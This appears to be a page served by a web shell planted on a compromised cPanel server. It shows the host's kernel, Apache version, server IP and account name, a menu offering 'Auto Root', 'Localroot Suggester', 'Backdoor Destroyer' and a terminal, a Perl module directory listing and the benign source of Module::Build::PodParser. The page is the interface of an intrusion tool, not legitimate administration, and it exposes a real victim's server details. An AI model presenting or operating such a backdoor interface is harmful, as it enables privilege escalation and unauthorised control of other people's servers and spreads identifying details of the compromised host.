Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
lib /
Module /
Build /
Delete
Unzip
Name
Size
Permission
Date
Action
Platform
[ DIR ]
drwxr-xr-x
2016-10-10 17:37
API.pod
67.08
KB
-r--r--r--
2014-12-27 11:49
Authoring.pod
10.75
KB
-r--r--r--
2014-12-27 11:49
Base.pm
162.69
KB
-r--r--r--
2014-12-27 11:49
Bundling.pod
4.96
KB
-r--r--r--
2014-12-27 11:49
Compat.pm
17.93
KB
-r--r--r--
2014-12-27 11:49
Config.pm
1.08
KB
-r--r--r--
2014-12-27 11:49
ConfigData.pm
6.78
KB
-r--r--r--
2014-12-27 11:49
Cookbook.pm
16.93
KB
-r--r--r--
2014-12-27 11:49
Dumper.pm
446
B
-r--r--r--
2014-12-27 11:49
ModuleInfo.pm
625
B
-r--r--r--
2014-12-27 11:49
Notes.pm
8.3
KB
-r--r--r--
2014-12-27 11:49
PPMMaker.pm
4.43
KB
-r--r--r--
2014-12-27 11:49
PodParser.pm
1.31
KB
-r--r--r--
2014-12-27 11:49
Version.pm
361
B
-r--r--r--
2014-12-27 11:49
YAML.pm
401
B
-r--r--r--
2014-12-27 11:49
Save
Rename
package Module::Build::PodParser; use strict; use vars qw($VERSION); $VERSION = '0.4205'; $VERSION = eval $VERSION; use vars qw(@ISA); sub new { # Perl is so fun. my $package = shift; my $self; @ISA = (); $self = bless {have_pod_parser => 0, @_}, $package; unless ($self->{fh}) { die "No 'file' or 'fh' parameter given" unless $self->{file}; open($self->{fh}, '<', $self->{file}) or die "Couldn't open $self->{file}: $!"; } return $self; } sub parse_from_filehandle { my ($self, $fh) = @_; local $_; while (<$fh>) { next unless /^=(?!cut)/ .. /^=cut/; # in POD # Accept Name - abstract or C<Name> - abstract last if ($self->{abstract}) = /^ (?: [a-z_0-9:]+ | [BCIF] < [a-z_0-9:]+ > ) \s+ - \s+ (.*\S) /ix; } my @author; while (<$fh>) { next unless /^=head1\s+AUTHORS?/i ... /^=/; next if /^=/; push @author, $_ if /\@/; } return unless @author; s/^\s+|\s+$//g foreach @author; $self->{author} = \@author; return; } sub get_abstract { my $self = shift; return $self->{abstract} if defined $self->{abstract}; $self->parse_from_filehandle($self->{fh}); return $self->{abstract}; } sub get_author { my $self = shift; return $self->{author} if defined $self->{author}; $self->parse_from_filehandle($self->{fh}); return $self->{author} || []; }